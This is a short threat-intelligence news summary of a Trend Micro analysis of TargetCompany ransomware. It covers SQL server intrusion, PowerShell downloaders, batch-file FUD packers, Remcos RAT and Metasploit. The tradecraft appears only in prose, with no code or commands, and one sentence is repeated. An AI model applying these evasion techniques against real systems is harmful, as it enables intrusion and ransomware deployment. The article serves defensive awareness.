TargetCompany Ransomware Layers Intrusions with Remcos

Category: Ransomware News | Industry: Global | Source: Trend Micro

Ransomware operators from the TargetCompany are employing fully undetectable (FUD) packers as part of their intrusion strategy, alongside the Remcos remote access trojan (RAT), in an effort to execute evasive infections. This attack chain was examined by threat analysts Don Ovid Ladores and Nathaniel Morales from Trend Micro, who reviewed malware samples and studied a live infection chain targeting a victim organization. For initial access, the threat actors continued their pattern of targeting vulnerable SQL servers. Once they established a foothold, the attackers executed a PowerShell script to download various executable files into the TEMP directory. Despite several failed download attempts of the executable files, one batch file successfully facilitated the download and installation of the Remcos RAT. Multiple download attempts had failed, aside from one batch file that was used to facilitate the download and installation of the Remcos RAT.

"The FUD packer used by Remcos and the one used by the TargetCompany ransomware has a style of packaging that closely resembles the style used by BatCloak: Using a batch file as an outer layer and afterward, decoding and loading using PowerShell to make a LOLBins execution," explains Trend Micro researchers. Metasploit also played a role in various TargetCompany infection routines, being used to create a new account and execute tools such as GMER, IObit Unlocker, and PowerTool/PowTool.

Trend Micro warns about the adoption of the 'cmd x PowerShell' loader as a potent attack technique, a trend that TargetCompany embraced since February 2022, attributing the start of this trend to OneNote campaigns that utilized PowerLoad in conjunction with an accompanying CMDFile. Unlike other malware such as AsyncRAT, which incorporates both decompression and decryption techniques, the CMDFiles utilized by loaders associated with Remcos and TargetCompany focus solely on integrating decompression into the routine of their binaries. It is likely that TargetCompany and their Remcos loaders modify the overall appearance or structure of the payload, likely to evade detection.